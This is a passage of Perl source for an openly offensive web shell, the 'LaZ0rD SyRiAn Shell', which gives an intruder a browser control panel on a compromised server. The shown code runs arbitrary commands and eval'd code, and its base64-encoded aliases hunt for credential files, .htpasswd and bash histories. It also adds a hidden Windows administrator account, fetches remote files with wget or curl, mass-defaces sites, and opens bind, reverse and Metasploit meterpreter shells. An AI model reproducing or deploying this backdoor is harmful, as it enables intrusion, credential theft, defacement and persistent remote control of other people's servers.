1909. <font color="gray" face="Comic Sans MS" style="font-size: 7pt">
1910. <p align="center"><sy>G3t Fr33 OR D!3 HarD</sy></p></font></td>
1911. </tr>
1912. </table><sy><br> </table> <table bgcolor="#cccccc" width="100%">
1913. <tr>
1914. <td width="100%">[<a href="#top">TOP</a></sy>] <center>
1915. ';
1916. CopyRight;
1917. exit;
1918. }
1919. ##############################################
1920. #--------------[ S T Y L E ] ---------------#
1921. ##############################################
1922. sub style
1923. {
1924. print <<END;
1925. <head>
1926. <title>1aZ0rD SyR!An Sh311 ~ V3~ [ G3t Fr33 OR D!3 HarD ]</title>
1927. <meta http-equiv="Content-Type" content="text/html;" charset="windows-1256">
1928. <style>
1929. BODY {
1930. FONT-FAMILY: Verdana;
1931. margin: 2;
1932. color: #cccccc;
1933. background-color: $Color_3;
1934. }
1935. sym {
1936. color: $Color_1;
1937. font-size: 10pt;
1938. font-weight: bold;
1939. }
1940. sy {
1941. color: $Color_1;
1942. font-size: 7pt;
1943. font-weight: bold;
1944. }
1945. syy {
1946. color: $Color_1;
1947. font-size: 8pt;
1948. font-weight: bold;
1949. }
1950. #Box {
1951. color: #990000;
1952. font-size: 14px;
1953. background-color: #000;
1954. font-weight: bold;
1955. }
1956. tr {
1957. BORDER-RIGHT: #cccccc 1px solid;
1958. BORDER-TOP: #cccccc 1px solid;
1959. BORDER-LEFT: #cccccc 1px solid;
1960. BORDER-BOTTOM: #cccccc 1px solid;
1961. color: #ffffff;
1962. }
1963. td {
1964. BORDER-RIGHT: #cccccc 1px solid;
1965. BORDER-TOP: #cccccc 1px solid;
1966. BORDER-LEFT: #cccccc 1px solid;
1967. BORDER-BOTTOM: #cccccc 1px solid;
1968. color: #cccccc;
1969. }
1970. .table1 {
1971. BORDER: 1px none;
1972. BACKGROUND-COLOR: #000000;
1973. color: #333333;
1974. }
1975. .td1 {
1976. BORDER: 1px none;
1977. color: #ffffff;
1978. font-style: normal;
1979. font-variant: normal;
1980. font-weight: normal;
1981. font-size: 7pt;
1982. font-family: tahoma;
1983. }
1984. .tr1 {
1985. BORDER: 1px none;
1986. color: #cccccc;
1987. }
1988. table {
1989. BORDER: #eeeeee outset;
1990. BACKGROUND-COLOR: #000000;
1991. color: #cccccc;
1992. }
1993. input {
1994. BORDER-RIGHT: $Color_1 1px solid;
1995. BORDER-TOP: $Color_1 1px solid;
1996. BORDER-LEFT: $Color_1 1px solid;
1997. BORDER-BOTTOM: $Color_1 1px solid;
1998. BACKGROUND-COLOR: #333333;
1999. font: 9pt tahoma;
2000. color: $Color_4;
2001. }
2002. select {
2003. BORDER-RIGHT: #ffffff 1px solid;
2004. BORDER-TOP: #999999 1px solid;
2005. BORDER-LEFT: #999999 1px solid;
2006. BORDER-BOTTOM: #ffffff 1px solid;
2007. BACKGROUND-COLOR: #000000;
2008. font: 9pt tahoma;
2009. color: #CCCCCC;
2010. }
2011. submit {
2012. BORDER: 1px outset buttonhighlight;
2013. BACKGROUND-COLOR: #272727;
2014. width: 40%;
2015. color: #cccccc;
2016. }
2017. textarea {
2018. width: 100%;
2019. BORDER-RIGHT: #ffffff 1px solid;
2020. BORDER-TOP: #999999 1px solid;
2021. BORDER-LEFT: #999999 1px solid;
2022. BORDER-BOTTOM: #ffffff 1px solid;
2023. BACKGROUND-COLOR: $Color_5;
2024. color: #ffffff;
2025. }
2026. A:link {
2027. COLOR: $Color_1;
2028. TEXT-DECORATION: none;
2029. }
2030. A:visited {
2031. COLOR: $Color_1;
2032. TEXT-DECORATION: none;
2033. }
2034. A:active {
2035. COLOR: $Color_1;
2036. TEXT-DECORATION: none;
2037. }
2038. A:hover {
2039. color: blue;
2040. TEXT-DECORATION: none;
2041. }
2042. </style>
2043. </head>
2044. END
2045. if (html_var('id') ne "logout")
2046. {
2047. unless($Cookies{'sy_shell'} ne create_session())
2048. {
2049. head_and_info();
2050. }
2051. }
2052. }
2053. ##############################################
2054. #------------ [ HTML & Style ] --------------#
2055. ##############################################
2056. sub head_and_info
2057. {
2058. #GET PHP VERSION
2059. my @php_v =split(/PHP\//,$ENV{'SERVER_SOFTWARE'});
2060. if ($php_v[1] eq "")
2061. {
2062. $php_v[1]="Unknown";
2063. }
2064. #GET HOST NAME
2065. use Sys::Hostname ;
2066. my $host=hostname;
2067. my ($sname,$pwd,$id_i,$t,$da,$ho,$tim);
2068. #UNAME
2069. if ($os eq "Linux")
2070. {
2071. $sname=`uname -an`;
2072. $pwd=$ENV{'SCRIPT_FILENAME'};
2073. $id_i=`id`;
2074. }
2075. else
2076. {
2077. $sname=`ver`;
2078. $pwd=$ENV{'SCRIPT_FILENAME'};
2079. $id_i =`whoami`;
2080. }
2081. use Time::Piece;
2082. $t = localtime;
2083. $da = $t->ymd;
2084. $ho =$t->hms;
2085. $tim = "$da $ho";
2086. print <<END;
2087. <table bgcolor="#cccccc" cellpadding="0" cellspacing="0" width="100%">
2088. <tr>
2089. <td bgcolor="#000000" width="160"><span>
2090. <p align="center"><syy>
2091. --------------------</syy><br><font size="2" color="#FF0000">LaZ</font><font color="#008000" size="2">0rD
2092. SyRi</font><font size="2" color="#999999"><font>An Sh3ll</font><syy><br>
2093. --------------------<br>
2094. Professional version <br>
2095. Perl Shell</syy> </font></p>
2096. </span></td>
2097. <td bgcolor="#000000">
2098. <!------ Header ------>
2099. <p dir="ltr">
2100. <font size="1">&nbsp; <b>[<a href="?id=home">Main</a>]</b></span>&nbsp;
2101. <b>[</span><a href="?id=about">About</a>]</b></span>
2102. <b>[</span><a href="?id=logout">Logout</a>]</b></span>
2103. <b>[</span><a href="?id=Fuck">SuiCide</a>]</b></span>
2104. <br>
2105. <!------ Some Info ------>
2106. <font size='1'><br>
2107. &nbsp; System = <sy>$os</sy>
2108. &nbsp; PHP Version = <sy>$php_v[1]</sy>
2109. &nbsp; Http Name = <sy>$ENV{'SERVER_NAME'}</sy>
2110. &nbsp; Uname = <sy>$sname</sy><br>
2111. &nbsp; PWD = <sy>$pwd</sy>
2112. &nbsp; id = <sy>$id_i</sy>
2113. &nbsp; www = <sy>$ENV{'DOCUMENT_ROOT'}</sy><br>
2114. &nbsp; server_software = <sy>$ENV{'SERVER_SOFTWARE'}</sy>
2115. &nbsp; Server Name = <sy>$host</sy>
2116. &nbsp; Server Admin = <a href = 'mailto:$ENV{'SERVER_ADMIN'}'><u><sy>$ENV{'SERVER_ADMIN'}</sy>
2117. </u></a><br>
2118. &nbsp; Your IP = <sy>$ENV{'REMOTE_ADDR'}</sy>
2119. &nbsp; Server IP = <a href='http://bing.com/search?q=ip:$ENV{'SERVER_ADDR'}&go=&form=QBLH&filt=all' target='_blank'><u><sy>$ENV{'SERVER_ADDR'}</sy>
2120. </u></a>
2121. [</span><a target="_blank" href="http://www.yougetsignal.com/tools/web-sites-on-web-server">Reverse IP</a>]</span>
2122. &nbsp; Date Time = <sy>$tim </sy>
2123. <br/>
2124. <!------ End Some Info ------>
2125. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
2126. &nbsp; [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
2127. &nbsp; [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
2128.  
2129. <br>
2130. <br>
2131. <table bgcolor="#cccccc" width="100%">
2132. <tr>
2133. <td>
2134. <p dir="ltr" align="center">
2135. <font face="Comic Sans MS" size="5" color="#CC0000">1aZ0rD SyR!</font><font face="Comic Sans MS" size="5" color="#008000">An&nbsp; W3b</font><font face="Comic Sans MS" size="5" color="#808080">
2136. P3r11 Sh311</font><font face="Comic Sans MS"></b></div></font></p>
2137. <p dir="ltr" align="center"><font color="#999999" size="3">C0d3d By: LaZ0rD
2138. SyRiAn </font></font></p>
2139. </td>
2140. </tr>
2141. </table>
2142. &nbsp;&nbsp;[<a href="#down">Down</a>] [<a href="javascript:window.print()">Print</a>]
2143. </table>
2144. <table bgcolor="#cccccc" cellpadding='0' cellspacing='0'width="100%">
2145. <tr><td width="100%">
2146. <td colspan='2' align='center'></td></tr>
2147. <tr><td>
2148. END
2149. }
2150. ##############################################
2151. #---------------[ don't work ] -------------#
2152. ##############################################
2153. sub dont_work
2154. {
2155. msg_txt("[-] I am Sorry But This Don't Work On WinDows ");
2156. }
2157. ##############################################
2158. #---------------[ is it hex ] -------------#
2159. ##############################################
2160. sub ishex
2161. {
2162. $tmp=shift;
2163. if ($tmp=~/[a-f0-9]/i and $tmp!~/[g-z]/i)
2164. {
2165. return 1;
2166. }
2167. else
2168. {
2169. return 0;
2170. }
2171. }
2172. ##############################################
2173. #-----------[ HtmlSpecialChars ] -----------#
2174. ##############################################
2175. sub HtmlSpecialChars($){
2176. my $text = shift;
2177. $text =~ s/&/&amp;/g;
2178. $text =~ s/"/&quot;/g;
2179. $text =~ s/'/&#039;/g;
2180. $text =~ s/</&lt;/g;
2181. $text =~ s/>/&gt;/g;
2182. return $text;
2183. }
2184. sub HtmlSpecialChars_rev
2185. {
2186. my $text=shift;
2187. $text =~ s/&amp;/&/g;
2188. $text =~ s/&quot;/"/g;
2189. $text =~ s/&#039;/'/g;
2190. $text =~ s/&lt;/</g;
2191. $text =~ s/&gt;/>/g;
2192. return $text;
2193. }
2194. ##############################################
2195. #--------------- [ writable ] --------------#
2196. ##############################################
2197. sub writable
2198. {
2199. if (!-w shift)
2200. {
2201. return 0;
2202. }
2203. else
2204. {
2205. return 1;
2206. }
2207. }
2208. ##############################################
2209. #---------------[ HTML Main ] -------------#
2210. ##############################################
2211. if ($cmd eq "")
2212. {
2213. if ($os eq "Linux")
2214. {
2215. $cmd="ls -lia";
2216. }
2217. else
2218. {
2219. $cmd="dir"
2220. }
2221. }
2222. my $pwd_dir=html_var('pwd_dir');
2223. if ($pwd_dir)
2224. {
2225. if ($pwd_dir ne $path)
2226. {
2227. $path=$pwd_dir;
2228. }
2229. }
2230. print <<END;
2231. </form>
2232. <!------ Commend Line ------>
2233. <table width='100%'>
2234. <td width='30%' height='30'>
2235. <form name="command_line" method="POST" action= "?id=home" onSubmit="encode(command_line.cmd);encode(command_line.pwd_dir);encode(command_line.action);">
2236. <table width='100%' height='72' border='0' id='Box'>
2237. <tr>
2238. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2239. <td style='background-color:$Color_2;padding-left:10px;'>Command Line </td>
2240. </tr>
2241. <tr>
2242. <td height='45' colspan='2'>
2243. <p align="center">CMD :
2244. <input type='text' name='cmd' id='commandLine' value='$cmd' onblur='Blur("commandLine","$cmd")' onclick='Clear("commandLine" ,"$cmd")' size='59'>
2245. <input type="hidden" name="action" value="cmd"><br>path :
2246. <input type='text' name='pwd_dir' value="$path"size='59'>
2247. <br>
2248. <input id='Execute' type='submit' value='Execute' >
2249. <input id='Execute0' type='submit' value='help' name="help" >
2250. </td>
2251. </tr>
2252. </table>
2253. </form>
2254. </td>
2255. <!------ Commands Alias ------>
2256. <td width='30%' height='30'>
2257. <form name="command_alias" method="POST" action= "?id=home" onSubmit="encode(command_alias.pwd_dir);encode(command_alias.action);">
2258. <table width='100%' height='72' border='0' id='Box'>
2259. <tr>
2260. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2261. <td style='background-color:$Color_2;padding-left:10px;'>Commands Alias </td></tr><tr><td height='45' colspan='2'>
2262. <p align="center">
2263. END
2264. ######
2265. if ($os eq "Linux"){
2266. print <<END;
2267. <select name="cmd" size='1' >
2268. <option value=''>NONE</option>
2269. <option value='bHMgLWxh'>List dir</option>
2270. <option value='Y2F0IC9ldGMvaG9zdHM='>IP Addresses</option>
2271. <option value='Y2F0IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRy'>Check MMAP</option>
2272. <option value='bHNhdHRyIC12YQ=='>list file attributes on a Linux second extended file system</option>
2273. <option value='bmV0c3RhdCAtYW4gfCBncmVwIC1pIGxpc3Rlbg=='>show opened ports</option>
2274. <option value='ZmluZCAvIC10eXBlIGYgLXBlcm0gLTA0MDAwIC1scw=='>find all suid files</option>
2275. <option value='ZmluZCAuIC10eXBlIGYgLXBlcm0gLTA0MDAwIC1scw=='>find suid files in current dir</option>
2276. <option value='ZmluZCAvIC10eXBlIGYgLXBlcm0gLTAyMDAwIC1scw=='>find all sgid files</option>
2277. <option value='ZmluZCAuIC10eXBlIGYgLXBlcm0gLTAyMDAwIC1scw=='>find sgid files in current dir</option>
2278. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgY29uZmlnLmluYy5waHA='>find config.inc.php files</option>
2279. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgXCJjb25maWcqXCI='>find config* files</option>
2280. <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgXCJjb25maWcqXCI='>find config* files in current dir</option>
2281. <option value='ZmluZCAvIC1wZXJtIC0yIC1scw=='>find all writable folders and files</option>
2282. <option value='ZmluZCAuIC1wZXJtIC0yIC1scw=='>find all writable folders and files in current dir</option>
2283. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgc2VydmljZS5wd2Q='>find all service.pwd files</option>
2284. <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgc2VydmljZS5wd2Q='>find service.pwd files in current dir</option>
2285. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmh0cGFzc3dk'>find all .htpasswd files</option>
2286. <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmh0cGFzc3dk'>find .htpasswd files in current dir</option>
2287. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmJhc2hfaGlzdG9yeQ=='>find all .bash_history files</option>
2288. <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmJhc2hfaGlzdG9yeQ=='>find .bash_history files in current dir</option>
2289. <option value='ZmluZCAvIC10eXBlIGYgLW5hbWUgLmZldGNobWFpbHJj'>find all .fetchmailrc files</option>
2290. <option value='ZmluZCAuIC10eXBlIGYgLW5hbWUgLmZldGNobWFpbHJj'>find .fetchmailrc files in current dir</option>
2291. <option value='bG9jYXRlIGh0dHBkLmNvbmY='>locate httpd.conf files</option>
2292. <option value='bG9jYXRlIHZob3N0cy5jb25m'>locate vhosts.conf files</option>
2293. <option value='bG9jYXRlIHByb2Z0cGQuY29uZg=='>locate proftpd.conf files</option>
2294. <option value='bG9jYXRlIHBzeWJuYy5jb25m'>locate psybnc.conf files</option>
2295. <option value='bG9jYXRlIG15LmNvbmY='>locate my.conf files</option>
2296. <option value='bG9jYXRlIGFkbWluLnBocA=='>locate admin.php files</option>
2297. <option value='bG9jYXRlIGNmZy5waHA='>locate cfg.php files</option>
2298. <option value='bG9jYXRlIGNvbmYucGhw'>locate conf.php files</option>
2299. <option value='bG9jYXRlIGNvbmZpZy5kYXQ='>locate config.dat files</option>
2300. <option value='bG9jYXRlIGNvbmZpZy5waHA='>locate config.php files</option>
2301. <option value='bG9jYXRlIGNvbmZpZy5pbmM='>locate config.inc files</option>
2302. <option value='bG9jYXRlIGNvbmZpZy5pbmMucGhw'>locate config.inc.php</option>
2303. <option value='bG9jYXRlIGNvbmZpZy5kZWZhdWx0LnBocA=='>locate config.default.php files</option>
2304. <option value='bG9jYXRlIGNvbmZpZw=='>locate config* files </option>
2305. <option value='bG9jYXRlIC5jb25m'>locate .conf files</option>
2306. <option value='bG9jYXRlIC5wd2Q='>locate .pwd files</option>
2307. <option value='bG9jYXRlIC5zcWw='>locate .sql files</option>
2308. <option value='bG9jYXRlIC5odHBhc3N3ZA=='>locate .htpasswd files</option>
2309. <option value='bG9jYXRlIC5iYXNoX2hpc3Rvcnk='>locate .bash_history files</option>
2310. <option value='bG9jYXRlIC5teXNxbF9oaXN0b3J5'>locate .mysql_history files</option>
2311. <option value='bG9jYXRlIC5mZXRjaG1haWxyYw=='>locate .fetchmailrc files</option>
2312. <option value='bG9jYXRlIGJhY2t1cA=='>locate backup files</option>
2313. <option value='bG9jYXRlIGR1bXA='>locate dump files</option>
2314. <option value='bG9jYXRlIHByaXY='>locate priv files</option>
2315. </select>&nbsp;
2316. END
2317.  
2318. }else{
2319. my $serverip= $ENV{'SERVER_ADDR'};
2320. my @net= split(/[.]/,$serverip);
2321. my $netip = "$net[0].$net[1].$net[2].%s";
2322. my $scan1 = 'FOR /L %s in (1,1,255) do @ping -n 1 -w 100';
2323. my $scan2 ='|find "Reply"';
2324. my $scan = "$scan1 $netip $scan2";
2325. $scan=encode_base64($scan);
2326. print <<END;
2327. <select name="cmd" size='1' >
2328. <option value=''>NONE</option>
2329. <option value='RGly'>List Directory</option>
2330. <option value='aXBjb25maWc='>IP Addresses</option>
2331. <option value='bmV0c3RhdCAtYW4gfGZpbmQgTElTVEVOSU5H'>show opened ports</option>
2332. <option value='$scan'>Scan The Local Network</option>
2333. <option value='bmV0IHVzZXI='>show users</option>
2334. <option value='bmV0IHVzZXIgIExhWjByZCBMYVowcmQgL2FkZCA='>add user (LaZ0rd :LaZ0rd)</option>
2335. <option value='bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgTGFaMHJkIC9hZGQg'>add user LaZ0rd to administrator</option>
2336. <option value='ZGlyIC9zIC93IC9iIGluZGV4LnBocA=='>Find index.php in current dir</option>
2337. <option value='ZGlyIC9zIC93IC9iICpjb25maWcqLnBocA=='>Find *config*.php in current dir</option>
2338. <option value='bmV0c3RhdCAtYW4='>Show active connections</option>
2339. <option value='bmV0IHN0YXJ0'>Show running services</option>
2340. <option value='dGFza2xpc3Q='>Show Pro</option>
2341. <option value='bmV0IHVzZXI='>User accounts</option>
2342. <option value='bmV0IHZpZXc='>Show computers</option>
2343. <option value='YXJwIC1h'>ARP Table</option>
2344. <option value='aXBjb25maWcgL2FsbA=='>IP Configuration</option>
2345. <option value='c3lzdGVtaW5mbw=='>System Informations</option>
2346. <option value='Z2V0bWFj'>Get Mac Address</option>
2347. </select>&nbsp;
2348. END
2349. }
2350. print <<End;
2351. </p>
2352. <p align="center">
2353. <input type="hidden" name="action" value="cmd">
2354. <input type="hidden" name="pwd_dir" value="$path">
2355. <input id='Execute' type='submit' value='Execute' >
2356. </td>
2357. </tr>
2358. </table>
2359. </form>
2360. </td>
2361. <!--------------------------------------->
2362. <!------ Upload And Get Files ------>
2363. <tr>
2364. <td width='30%' height=30>
2365. <form name="get_upload" method="POST" action= "?id=home" onSubmit="encode_get_upload()">
2366. <table width='100%' height='72' border='0' id='Box'><tr>
2367. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2368. <td style='background-color:$Color_2;padding-left:10px;'>Upload &amp; Get File </td></tr><tr><td height='45' colspan='2'>
2369. <div id='get'>
2370. <input type="hidden" name="action" value="ZmlsZWdldA=="><p align="center"><input type="text" name="fileUrl" id="file_url" onblur="Blur(file_u,file_u_v);" onclick="Clear(file_u,file_u_v);" size="59" value="http://www."><select name="getType"><option value="d2dldA==">Auto</option><option value="d2dldA==">wget</option><option value="Y3VybCAtbw==">curl -o</option><option value="Z2V0">get</option><option value="bHlueCAtc291cmNl">lynx -source</option></select></div>
2371. <p align="center">
2372. <select id='action_1' onchange='Ch();'>
2373. <option value='fileget'>Get File Form wWw</option>
2374. <option value='upload'>Upload File From Your Pc</option>
2375. <option value='download'>Download File </option>
2376. </select>
2377. <p align="center">
2378. <input type="hidden" name="pwd_dir" value="$path">
2379. <input name='editFileSubmit' type='submit' value='Go'>
2380. </td></tr></table></form>
2381. <!------ Files & Folders Handling ------>
2382. <td width='30%' height=30>
2383. <form name="file_handling" method="POST" action= "?id=home" onSubmit="encode_file_handling();">
2384. <table width='100%' height='72' border='0' id='Box'><tr>
2385. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2386. <td style='background-color:$Color_2;padding-left:10px;'>Files & Folders Handling </td></tr><tr><td height='45' colspan='2'>
2387. <div id='newName'>
2388. <p align="center">
2389. <input type="hidden" name="action" value="UmVuYW1lRmlsZQ==">
2390. <input type="text" name="RenameFile_a" id="commandLine4" value="File Name" onblur="Blur('commandLine4','File Name');" onclick="Clear('commandLine4','File Name');" size="40">
2391. <input type="text" name="RenameFile_b" id="commandLine5" value="File New Name" onblur="Blur('commandLine5','File New Name');" onclick="Clear('commandLine5','File New Name');" size="40">
2392. </div>
2393. <p align="center">
2394. <select name='actiontype' id='actionType' onchange='ChangeInputs();'>
2395. <option value='rename'>Rename</option>
2396. <option value='read_file'>Read File</option>
2397. <option value='edit_file'>Edite File</option>
2398. <option value='chmod'>Change Mode</option>
2399. <option value='delfile'>Delete File or Folder</option>
2400. <option value='copy'>Copy File</option>
2401. <option value='mkdir'>Create Folder</option>
2402. <option value='777'>777 Folder Finder</option>
2403. </select>
2404. <p align="center">
2405. <input type="hidden" name="pwd_dir" value="$path">
2406. <input name='editFileSubmit' type='submit' value='Do'>
2407. </form>
2408. </td></tr></table></form>
2409. </td></tr>
2410. <!------- Forbidden -------->
2411. <td width='30%' height='30'>
2412. <form name="forbid" method="POST" action= "?id=home" onSubmit="encode(forbid.pwd_dir);">
2413. <table width='100%' height='72' border='0' id='Box'><tr>
2414. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2415. <td style='background-color:$Color_2;padding-left:10px;'>Forbidden Bypasser</td></tr><tr><td height='45' colspan='2'>
2416. <p align="center">
2417. <input type="text" name="pwd_dir" id="cd_dir" onblur="Blur('cd_dir','$path');" size="40" value="$path">
2418. <select name="403"><option value="RGlyZWN0b3J5SW5kZXg=">DirectoryIndex</option><option value="RGlyZWN0b3J5SW5kZXg=">HeaderName</option><option value="TXT">TXT</option><option value="NDA0">404</option><option value="UmVhZG1lTmFtZQ==">ReadmeName</option><option value="Zm9vdGVyTmFtZQ==">footerName</option></select>
2419. <p align="center">
2420. <input type="hidden" name="action" value="Zm9y">
2421. <input type='submit' value='Generate' name='generateForbidden'>
2422. </td></tr></table></form>
2423. </td>
2424. <!------- Server Shortcut -------->
2425. <td width='30%' height='30'>
2426. <form name="ser_cut" method="POST" action= "?id=home" onSubmit="encode(ser_cut.genServpath);">
2427. <table width='100%' height='72' border='0' id='Box'><tr>
2428. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2429. <td style='background-color:$Color_2;padding-left:10px;'>Server Shortcut</td></tr><tr><td height='45' colspan='2'>
2430. <p align="center">
2431. <input type="text" name="genServpath" id="server_sho" onblur="Blur('server_sho','$path');"size="40" value="$path">
2432. <input type="hidden" name="action" value="dW56aXA="><p align="center">
2433. <input type='submit' value='Generate' name='generate'>
2434. </td></tr></table></form>
2435. </td>
2436. <tr>
2437. <!------ Scanners And Strings Tools ------>
2438. <td width='30%' height='30'>
2439. <form name="scan_str" method="POST" action= "?id=home" onSubmit="encode(scan_str.stringtool)">
2440. <table width='100%' height='72' border='0' id='Box'><tr>
2441. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2442. <td style='background-color:$Color_2;padding-left:10px;'>Scanners And Strings Tools </td></tr><tr><td height='45' colspan='2'>
2443. <p align="center">&nbsp;<input type='textarea' name='stringtool' id='tool' onblur="Blur('tool',evalOrEnc2());" onclick="Clear('tool',evalOrEnc2())" value='print "Hello,all";' size='59'>
2444. <select id='evalOrEnc' name='acti' onchange='chen_eval(evalOrEnc2());'>
2445. <option value='eval'>Eval Code</option>
2446. <option value='enc'>Encryption</option>
2447. <option value='analyze'>Analyze</option>
2448. </select>
2449. <br>
2450. <input type="hidden" name="action" value="ZXZhbA==">
2451. <input id='Execute1' type='submit' value='ok' >
2452. </td></tr></table></form>
2453. </td>
2454. <!------ Users & Domains ------>
2455. <td width='30%' height='30'>
2456. <form name="scan_str" method="POST" action= "?id=home" >
2457. <table width='100%' height='72' border='0' id='Box'><tr>
2458. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2459. <td style='background-color:$Color_2;padding-left:10px;'> Users & Domains </td></tr><tr><td height='45' colspan='2'>
2460. <p align="center">
2461. <input type="hidden" name="action" value="dXNlcl9kb21pbg==">
2462. <input id='Execute1' type='submit' value='GET Users & Domains ' >
2463. </td></tr></table></form>
2464. </td>
2465. <tr>
2466. <!------- Fast Defacement -------->
2467. <td width='30%' height='30'>
2468. <form name="mass_defacement" method="POST" action= "?id=home" onSubmit="encode(mass_defacement.pwd_dir);encode(mass_defacement.massIndex);encode(mass_defacement.massFileName)">
2469. <table width='100%' height='72' border='0' id='Box'><tr>
2470. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2471. <td style='background-color:$Color_2;padding-left:10px;'>Fast Defacement</td></tr><tr><td height='45' colspan='2'>
2472. <center><input type='text' name='massIndex' id='massDir' onblur='Blur("massDir","Hacked By 1aZ0rD SyR!An")' onclick='Clear("massDir","Hacked By 1aZ0rD SyR!An")' value='Hacked By 1aZ0rD SyR!An' size='70' /><input type='text' name='massFileName' id='massFileName'onblur='Blur("massFileName","index.html")' onclick='Clear("massFileName","index.html")' value='index.html' size='15' /><p><input type="text" name="pwd_dir" size="40" value="$path">&nbsp;
2473. <input type="hidden" name="action" value="bWFzcw==">
2474. <input type='submit' value='Deface Now' name='s'>
2475. </p>
2476. </td></tr></table></form>
2477. </td>
2478.  
2479. <!------- Zone-h Mass Deface -------->
2480. <td width='30%' height='30'>
2481. <form name="zon_h" method="POST" action= "?id=home" onSubmit="encode(zon_h.hacker);">
2482. <table width='100%' height='72' border='0' id='Box'><tr>
2483. <td width='4%' height='21' style='background-color:$Color_1'>&nbsp;</td>
2484. <td style='background-color:$Color_2;padding-left:10px;'>Zone-h Mass Deface</td></tr><tr><td height='45' colspan='2'>
2485. <center><input type='text' name='hacker' id='zoneid' onblur='Blur("zoneid","Hacker Name")' onclick='Clear("zoneid","Hacker Name")' value='Hacker Name' size='70' />
2486. <input type="hidden" name="action" value="em9uZS1o"></p>
2487. <input type='submit' value='Deface Now' name='s'>
2488. </p>
2489. </td></tr></table></form>
2490. </td>
2491. <tr>
2492. <!------ Bind Port ------>
2493. <td width="30%" height="30">
2494. <form name="bin_por" method="POST" action= "?id=home" onSubmit="encode(bin_por.bind_port)">
2495. <input type="hidden" name="action" value="YmluZF9wb3J0">
2496. <table width="100%" height="72" border="0" id="Box">
2497. <tr>
2498. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2499. <td style="background-color:$Color_2;padding-left:10px;">Bind Port </td>
2500. </tr>
2501. <tr>
2502. <td height="45" colspan="2">
2503. <p align="center">
2504. <input type="text" name="bind_port" id="binport" onblur='Blur("binport",4444)' onclick='Clear("binport",4444)' value="4444" size="40"></p>
2505. <p align="center"><select name="type">
2506. <option value="cGVybDE=">Perl[1]</option>
2507. <option value="cGVybDI=">Perl[2](Good)</option>
2508. <option value="cnVieQ==">Ruby</option>
2509. <option value="Yw==">C(Good)</option>
2510. <option value="aW5ldGQ=">inetd</option>
2511. </select> </p>
2512. <p align="center">&nbsp;<input type="submit" value="Bind"> </p>
2513. </td>
2514. </tr>
2515. </table>
2516. </form>
2517. </td>
2518. <!------ Reverse ------>
2519. <td width="30%" height="30">
2520. <form name="rever" method="POST" action= "?id=home" onSubmit="encode(rever.ip_r);encode(rever.pwd_dir);encode(rever.re_port)">
2521. <input type="hidden" name="action" value="cmV2ZXJz">
2522. <table width="100%" height="72" border="0" id="Box">
2523. <tr>
2524. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2525. <td style="background-color:$Color_2;padding-left:10px;">Reverse</td>
2526. </tr>
2527. <tr>
2528. <td height="45" colspan="2">
2529. <p align="center">
2530. <input type="text" name="ip_r" id="commandLine4" value="$ENV{'REMOTE_ADDR'}" size="40">
2531. <input type="hidden" name="pwd_dir" value="$path">
2532. <input type="text" name="re_port" id="re_por" value="Port" onblur='Blur("re_por","Port")' onclick='Clear("re_por","Port")' size="40"></p>
2533. <p align="center"><select name="type">
2534. <option value="cGVybA==">Perl[1]</option>
2535. <option value="cGVybDI=">Perl[2]</option>
2536. <option value="cGVybDM=">Perl[3]</option>
2537. <option value="cnVieQ==">Ruby</option>
2538. <option value="c2g=">telnet[sh]</option>
2539. </select> </p>
2540. <p align="center"><input type="submit" value="OK"> </p>
2541. </td>
2542. </tr>
2543. </table>
2544. </form>
2545. </td>
2546. </tr>
2547. <tr>
2548. <!------ meterpreter Bind ------>
2549. <td width="30%" height="30">
2550. <form name="meter_b" method="POST" action= "?id=home" onSubmit="encode(meter_b.bind_port);encode(meter_b.ip)">
2551. <input type="hidden" name="action" value="bWV0ZXJfYmluZA==">
2552. <table width="100%" height="72" border="0" id="Box">
2553. <tr>
2554. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2555. <td style="background-color:$Color_2;padding-left:10px;">PHP Meterpreter -> Metasploit Bind
2556. Connection</td>
2557. </tr>
2558. <tr>
2559. <td height="45" colspan="2">
2560. <p align="center">
2561. <input type="text" name="bind_port" id="commandLine4" value="4444" size="40">
2562. <input type="text" name="ip" id="rhost" onblur='Blur("rhost","RHOST")' onclick='Clear("rhost","RHOST")' value="RHOST" size="40"></p>
2563. </p>
2564. <p align="center">&nbsp;<input type="submit" value="connect"> </p>
2565. </td>
2566. </tr>
2567. </table>
2568. </form>
2569. </td>
2570. <!------ meterpreter Reverse ------>
2571. <td width="30%" height="30">
2572. <form name="meter_re" method="POST" action= "?id=home" onSubmit="encode(meter_re.ip_r);encode(meter_re.re_port)">
2573. <input type="hidden" name="action" value="bWV0ZXJfcmV2ZXJz">
2574. <table width="100%" height="72" border="0" id="Box">
2575. <tr>
2576. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2577. <td style="background-color:$Color_2;padding-left:10px;">PHP Meterpreter -> Metasploit Reverse
2578. Connection</td>
2579. </tr>
2580. <tr>
2581. <td height="45" colspan="2">
2582. <p align="center">
